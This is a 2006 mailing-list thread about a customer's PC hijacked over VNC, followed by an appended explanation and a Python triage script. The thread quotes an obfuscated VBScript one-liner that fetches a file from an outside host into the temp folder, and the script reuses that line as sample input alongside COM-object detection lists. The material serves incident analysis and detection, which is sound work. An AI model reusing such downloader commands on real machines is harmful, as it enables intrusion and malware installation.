Dunno what was going on there, but your user definitely was rooted with a malicious VNC. It's a common tactic: person visits website, gets spyware'd, spyware installs a reverse-VNC connection so the attacker can gain control over the box even if it is behind a firewall. What you were seeing was most likely an attempt to inject more payload into the machine in order for it to become part of a botnet.
Unless someone was playing an elaborate joke, which I doubt. Tell the user to use Firefox. It even works with SL! (After you wipe the PC. You have to nuke it from orbit. It's the only way to be sure.)

-----Original Message-----
From: Chris Curtis [mailto:[EMAIL PROTECTED]
Sent: Wednesday, September 27, 2006 4:31 PM
To: [email protected]
Subject: [SL] Off topic question

Hello All.

This is very off topic, but I figure it won't kill anyone if I ask. There are a number of very smart cookies on this list, and I bet someone out there can enlighten me.

Today I got a call from one of my customers who runs VNC for remote support access. She was working away, and suddenly her mouse started to move, it opened up a CMD session (it's really a DOS session, but we aren't supposed to know that Windows is just another DOS app, are we!!!) and it typed the following:

C:\Documents and Settings\sales>CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/

NETSTAT On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct ("mSxmL2.xmLhttp"):p.OpEn"gEt", "HtTp://WwW.JmDoNgyI.CoM/

Now, I am not an XML guy, but it looks to me like this person was trying to use XML and download content from a likely infected website. I went to the website (I use a Mac, so I don't generally worry about getting a browser hack) and, you guessed it, it was a Chinese site. I googled the www.jmdongyi.com name but got no hits.

I connected to her PC and found no strange connections to it at the time. I ran a malware and virus scan and it was clean also. I had her turn off VNC for now and explained to her how she could turn it on when she needs to allow someone access. Incidentally, she was using a non-dictionary password with alpha and numeric characters.

My question is, what was the XML string actually trying to do?

Thanks to all who offer assistance.
Chris Curtis
Sandpoint Computers
Office 208-265-1608
Cell 208-610-3062

-------------------------------------------------------------------------
Take Surveys. Earn Cash. Influence the Future of IT
Join SourceForge.net's Techsay panel and you'll get the chance to share your
opinions on IT & business topics through brief surveys -- and earn cash
http://www.techsay.com/default.php?page=join.php&p=sourceforge&CID=DEVDEV
_______________________________________________
sql-ledger-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/sql-ledger-users
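The string typed into the console above is what a keyboard-only intruder does when they have a VNC session but no file transfer: ECHO a VBScript one-liner into %TMP% and have it fetch a file over HTTP with the MSXML2.XMLHTTP COM object. The command in the mail is cut off before the part that would write the script to disk and run it, so the visible text only shows the download stage. Below is an added triage helper, not part of the thread, that pulls the observable indicators out of a typed command of this shape (the URL, the COM ProgID, the target filename, the ON ERROR RESUME NEXT suppression, the mixed-case obfuscation) and classifies it. The function and indicator names are mine, the sample input is constructed from the line quoted in the mail (truncated as it was there) plus one benign line, and the COM ProgID lists are my assumption of the objects such one-liners commonly use.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample input. The first line is the command quoted in the
# mail above (truncated there, so truncated here); the second is a
# benign line to show the triage does not flag every use of %TMP%.
SAMPLE_TYPED_COMMANDS = [
    r'CD %TMP%&ECHO On ERROR RESUmE nExt:F="L.eXe":SEt p=cREAtEOBjEct("mSxmL2.xmLhttp"):p.OpEn"gEt","HtTp://WwW.JmDoNgyI.CoM/',
    r'CD %TMP% & DIR',
]

# Assumed lists: COM ProgIDs a VBScript one-liner typically uses to fetch
# (download set) or launch (exec set) a file.
DOWNLOAD_COM_OBJECTS = {"msxml2.xmlhttp", "microsoft.xmlhttp", "adodb.stream"}
EXEC_COM_OBJECTS = {"wscript.shell", "shell.application"}


@dataclass
class Finding:
    command: str
    verdict: str = "benign"
    indicators: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)
    com_objects: List[str] = field(default_factory=list)
    dropped_files: List[str] = field(default_factory=list)


def _mixed_case_tokens(cmd: str) -> List[str]:
    """Alphabetic tokens with three or more upper/lower flips: a cheap tell
    for keyword obfuscation aimed at naive case-sensitive signatures."""
    flagged = []
    for tok in re.findall(r"[A-Za-z]{4,}", cmd):
        flips = sum(1 for a, b in zip(tok, tok[1:]) if a.isupper() != b.isupper())
        if flips >= 3:
            flagged.append(tok)
    return flagged


def triage_typed_command(cmd: str) -> Finding:
    f = Finding(command=cmd)
    low = cmd.lower()

    # Script body being ECHOed into %TMP%: the operator only has a
    # keyboard, so the dropper is typed rather than uploaded.
    if "%tmp%" in low and "echo" in low:
        f.indicators.append("echo-script-into-temp")
    if "on error resume next" in low:
        f.indicators.append("error-suppression")

    # CreateObject("...") targets, normalised to lowercase ProgIDs.
    f.com_objects = [m.lower() for m in re.findall(r'createobject\s*\(\s*"([^"]+)"', cmd, re.I)]
    if any(o in DOWNLOAD_COM_OBJECTS for o in f.com_objects):
        f.indicators.append("http-download-com-object")
    if any(o in EXEC_COM_OBJECTS for o in f.com_objects):
        f.indicators.append("shell-exec-com-object")

    # Remote URLs, lowercased so the mixed-case trick does not split hits.
    f.urls = [u.lower() for u in re.findall(r'https?://[^\s"\']+', cmd, re.I)]
    if f.urls:
        f.indicators.append("remote-url")

    # Quoted filenames with an executable extension (the F="L.eXe" part).
    f.dropped_files = re.findall(r'"([^"]+\.(?:exe|dll|vbs|bat|com|scr))"', cmd, re.I)
    if f.dropped_files:
        f.indicators.append("executable-filename")

    if _mixed_case_tokens(cmd):
        f.indicators.append("mixed-case-obfuscation")

    # Download object plus a URL is the downloader stage by itself; two or
    # more weaker indicators are enough to call the line suspicious.
    if "http-download-com-object" in f.indicators and f.urls:
        f.verdict = "downloader"
    elif len(f.indicators) >= 2:
        f.verdict = "suspicious"
    return f


def triage_all(cmds: List[str]) -> List[Finding]:
    return [triage_typed_command(c) for c in cmds]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_TYPED_COMMANDS):
        print(f"{r.verdict:10s} {r.indicators} urls={r.urls} drops={r.dropped_files}")
```

The extracted URL and filename are the items worth checking on the box afterwards: the file named in the script under %TMP%, and any process or scheduled task that references it. Because the typed command was truncated in the mail, the helper says nothing about the execution step; on a live host that is the part to look for in the temp directory and in the shell's command history, not in the script text alone.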
